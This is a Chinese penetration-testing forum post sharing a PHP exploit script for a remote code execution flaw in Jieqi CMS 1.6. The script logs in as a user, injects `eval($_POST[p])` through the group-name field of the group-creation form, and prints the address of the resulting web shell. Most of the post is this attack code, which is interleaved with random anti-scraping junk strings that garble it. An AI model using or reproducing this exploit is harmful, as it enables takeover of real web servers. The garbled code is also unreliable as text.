中国网络渗透测试联盟

标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP [打印本页]

作者: admin    时间: 2013-2-23 11:28
标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
& }: p# z# X0 c7 U# n) @
, f+ r) t; A; c
1 f6 m5 r( X/ n$ E0 s6 r该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。# J2 B; `$ y/ v' ]5 e
需要有一个能创建圈子的用户。
1 x2 i- l/ s' k" N( e7 b: @
# ~+ B1 U* w# N) S+ J0 n8 P; p9 j) L<?php* F' t  `% V; G# s# @0 a0 `% @
1 ]+ A! W2 L+ l0 [6 s' x
print_r('
$ a  w: F/ `) l* w4 u+---------------------------------------------------------------------------+0 X* v: ?$ l) Q; T  r7 r0 ^
Jieqi CMS V1.6 PHP Code Injection Exploit7 T8 B& X7 }1 P1 W" x
by flyh4t
5 ?9 g+ E+ _7 [* ~mail: phpsec at hotmail dot com
9 A, G: |+ M0 e5 Vteam: http://www.wolvez.org
- @$ E1 a) ]" P9 o$ u9 [) u7 D( H+---------------------------------------------------------------------------+( {/ R( G# d! I8 k- h2 g' }# l8 U
'); /**
2 s% x, i) g7 T& D% w4 K& M: I * works regardless of php.ini settings
) C2 k/ w3 U. J, e" Q& O. z0 {*/ if ($argc < 5) { print_r('
) V; u- W& ^) Y! c" _8 H, z' f+---------------------------------------------------------------------------+
6 w: j! i8 F( E9 H! [Usage: php '.$argv[0].' host path username
  V3 v* O5 @' F4 E6 v- c% C, Shost:      target server (ip/hostname)1 I6 R2 U. v! t  O
path:      path to jieqicms   {) D% y8 R3 I
uasename:  a username who can create group  ]/ B, b+ M8 n: Z* i( `3 n  `
Example:
7 \5 L* e; F8 u, `" o4 Lphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password: z6 v& j  B7 `* D" R9 G0 l
+---------------------------------------------------------------------------+9 e3 o7 d" H$ T. b; Q; o
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961; F8 e; W3 k5 E8 C+ u
Content-Disposition: form-data; name="gname"
0 o5 s( w* s4 t+ X2 U 6 K. ?" a# F/ o, ^3 t, g! R
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
: I" P; o8 b" ~8 s+ o% G/ J-----------------------------23281168279961
$ z1 J% S; Q. w+ S6 ?5 ~1 QContent-Disposition: form-data; name="gcatid"# G) ~2 Q6 N7 F2 }- X3 j. i0 x

+ i$ z6 X& r$ R1
( R4 M6 ^+ u; l4 v2 V9 I7 J" @-----------------------------232811682799619 _) b1 B. M1 K% E+ E$ H& y
Content-Disposition: form-data; name="gaudit"
; z. n2 {& t- X0 p1 O; t, H
# h) x+ ^$ j+ j8 p) J1
. g9 Q. d9 U! }-----------------------------232811682799619 A1 _# j5 u! A4 z  R
Content-Disposition: form-data; name="gbrief"; Z8 A9 o: Y9 b. s- A
5 D# I3 \5 N0 n' U
1
  n2 V8 i% {6 k-----------------------------23281168279961--
! g% n) j0 ]" e/ N'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
7 H5 B0 ?; n3 X( ]! N * I, K- I& C7 l& S" p7 |2 j
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2